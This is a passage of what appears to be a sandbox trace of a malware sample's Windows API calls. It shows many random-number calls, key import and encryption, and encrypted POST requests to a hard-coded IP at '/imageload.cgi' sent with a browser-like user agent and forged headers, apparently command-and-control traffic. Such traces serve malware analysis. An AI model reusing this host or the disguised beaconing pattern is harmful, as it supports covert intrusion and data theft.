dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.965] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.966] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f42c | out: pbBuffer=0x18f42c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.967] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.968] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.968] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f36c | out: pbBuffer=0x18f36c) returned 1 [0088.976] InternetCrackUrlA (in: lpszUrl="http://212.109.220.109/imageload.cgi", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x18e614 | out: lpUrlComponents=0x18e614) returned 1 [0089.226] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x18f070, cbSize=0x18f40c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x18f40c) returned 0x0 [0089.247] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0089.248] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x18f420, dwBufferLength=0x4) returned 1 [0089.249] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x18f420, dwBufferLength=0x4) returned 1 [0089.249] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x3, lpBuffer=0x18f420, dwBufferLength=0x4) returned 1 [0089.250] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x49, lpBuffer=0x18f420, dwBufferLength=0x4) returned 0 [0089.250] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x4a, lpBuffer=0x18f420, dwBufferLength=0x4) returned 0 [0089.250] InternetConnectA (hInternet=0xcc0004, lpszServerName="212.109.220.109", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0089.263] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/imageload.cgi", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844c0300, dwContext=0x0) returned 0xcc000c [0089.263] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x4d, lpBuffer=0x0, dwBufferLength=0x0) returned 1 [0089.263] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*\r\nAccept-Language: en-us\r\nReferer: http://212.109.220.109/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache", dwHeadersLength=0xd1, dwModifiers=0xa0000000) returned 1 [0089.265] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x572a98*, dwOptionalLength=0x408 | out: lpOptional=0x572a98*) returned 1 [0090.350] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x18e604, lpdwBufferLength=0x18e5ec, lpdwIndex=0x0 | out: lpBuffer=0x18e604*, lpdwBufferLength=0x18e5ec*=0x4, lpdwIndex=0x0) returned 1 [0090.350] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x18e604, lpdwBufferLength=0x18e5ec, lpdwIndex=0x0 | out: lpBuffer=0x18e604*, lpdwBufferLength=0x18e5ec*=0x4, lpdwIndex=0x0) returned 1 [0090.350] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x571498, dwNumberOfBytesToRead=0x15c, lpdwNumberOfBytesRead=0x18e600 | out: lpBuffer=0x571498*, lpdwNumberOfBytesRead=0x18e600*=0x15c) returned 1 [0090.350] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0090.350] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0090.350] CryptHashData (hHash=0x5f9678, pbData=0x571498, dwDataLen=0x148, dwFlags=0x0) returned 1 [0090.350] CryptGetHashParam (in: hHash=0x5f9678, dwParam=0x2, pbData=0x18f3bc, pdwDataLen=0x18f43c, dwFlags=0x0 | out: pbData=0x18f3bc, pdwDataLen=0x18f43c) returned 1 [0090.350] CryptDestroyHash (hHash=0x5f9678) returned 1 [0090.351] CryptDestroyKey (hKey=0x5f73e8) returned 1 [0090.351] CryptDestroyHash (hHash=0x5f73a8) returned 1 [0090.351] CryptDestroyKey (hKey=0x5f44c0) returned 1 [0090.351] GetUserDefaultUILanguage () returned 0x409 [0090.351] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0x18fcb8, cchData=32 | out: lpLCData="en") returned 3 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x1, pbBuffer=0x18fcc3 | out: pbBuffer=0x18fcc3) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x20, pbBuffer=0x18fbac | out: pbBuffer=0x18fbac) returned 1 [0090.351] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x18f824, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x18fc80 | out: phKey=0x18fc80*=0x5fbfd8) returned 1 [0090.351] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5fbfd8, dwFlags=0x0, phHash=0x18fc84 | out: phHash=0x18fc84) returned 1 [0090.351] CryptSetHashParam (hHash=0x5fc018, dwParam=0x5, pbData=0x18f8a8, dwFlags=0x0) returned 1 [0090.351] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x18f824, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x18fc78 | out: phKey=0x18fc78*=0x5fc058) returned 1 [0090.351] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5fc058, dwFlags=0x0, phHash=0x18fc7c | out: phHash=0x18fc7c) returned 1 [0090.351] CryptSetHashParam (hHash=0x5fc098, dwParam=0x5, pbData=0x18f8a8, dwFlags=0x0) returned 1 [0090.351] CryptHashData (hHash=0x5fc018, pbData=0x571600, dwDataLen=0xf9, dwFlags=0x0) returned 1 [0090.351] CryptGetHashParam (in: hHash=0x5fc018, dwParam=0x2, pbData=0x18fbcd, pdwDataLen=0x18fcbc, dwFlags=0x0 | out: pbData=0x18fbcd, pdwDataLen=0x18fcbc) returned 1 [0090.351] CryptEncrypt (in: hKey=0x5f2330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x18fbac*, pdwDataLen=0x18f8f8*=0x35, dwBufLen=0x80 | out: pbData=0x18fbac*, pdwDataLen=0x18f8f8*=0x80) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.351] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.352] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.353] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.354] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.354] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.354] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.354] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.354] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0090.354] InternetCrackUrlA (in: lpszUrl="http://212.109.220.109/imageload.cgi", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x18eacc | out: lpUrlComponents=0x18eacc) returned 1 [0090.354] InternetConnectA (hInternet=0xcc0004, lpszServerName="212.109.220.109", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0090.354] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/imageload.cgi", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844c0300, dwContext=0x0) returned 0xcc000c [0090.354] InternetSetOptionA 